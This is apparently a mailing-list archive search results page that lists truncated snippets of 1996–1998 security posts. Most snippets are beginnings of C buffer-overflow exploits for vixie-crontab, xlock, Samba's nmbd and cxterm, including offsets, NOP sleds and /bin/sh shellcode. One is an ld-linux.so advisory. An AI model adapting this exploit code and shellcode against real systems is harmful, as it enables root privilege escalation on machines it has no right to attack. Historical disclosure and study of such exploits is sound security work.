Displaying 5 results from an estimated 5 matches for "default_offset".

1996 Dec 15
0
vixie-crontab for redhat linux
...uses vixie crontab. * I didn't find this, just exploited it. * * * Dave G. * <daveg@escape.com> * http://www.escape.com/~daveg * * */ #include <stdio.h> #include <sys/types.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #define DEFAULT_OFFSET -1240 #define BUFFER_SIZE 100 /* MAX_TEMPSTR is 100 */ #define HAPPY_FILE "./Window" long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { int fd; char *buff = NULL; unsigned long *addr_ptr = NULL;...
1997 Apr 27
0
Overflow in xlock (fwd)
...rg 4/17/97 Original exploit framework - lpr exploit Usage: make xlock-exploit xlock-exploit <optional_offset> Assumptions: xlock is suid root, and installed in /usr/X11/bin */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #define DEFAULT_OFFSET 50 #define BUFFER_SIZE 996 long get_esp(void) { __asm__("movl %esp,%eax\n"); } int main(int argc, char *argv[]) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int dfltOFFSET = DEFAULT_OFFSET; u_char execshell[] = "\xeb...
1997 Sep 26
3
Forwarded mail....
...ity pinched from ADMtoolz for get the netbios name -------------------------------------------------------------------------- ------------------------------[ADMnmbname.c]---------------------------------- -------------------------------------------------------------------------- */ #define DEFAULT_OFFSET 3500 #define DEFAULT_BUFFER_SIZE 3081 #define NOP 0x90 #define NMBHDRSIZE 13 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/wait.h> #include <sys/ioctl.h> #in...
1997 May 14
4
cxterm buffer overrun
...on both Slackware 3.1 and 3.2. Ming Zhang mzhang@softcom.net */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZE 1024 #define DEFAULT_OFFSET 50 #define NOP_SIZE 1 char nop[] = "\x90"; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp...
1998 Feb 04
0
An old ld-linux.so hole
...n. You may need to change some default parameters, for instance the number of eat_time processes or eat_desc (the latter if your kernel file table size is greater than 1024 or the limit of file descriptors per process is less than 256). If the exploit doesn't work, you may experiment with DEFAULT_OFFSET in doit.sh Section VIII. Traditional closing unrelated mumbling One simple conclusion from the above musings - no buffer overflow is harmless. As usual, I encourage any comments (to be sent to nergal@icm.edu.pl). I remind you that I'm still an unemployed student, which should be ch...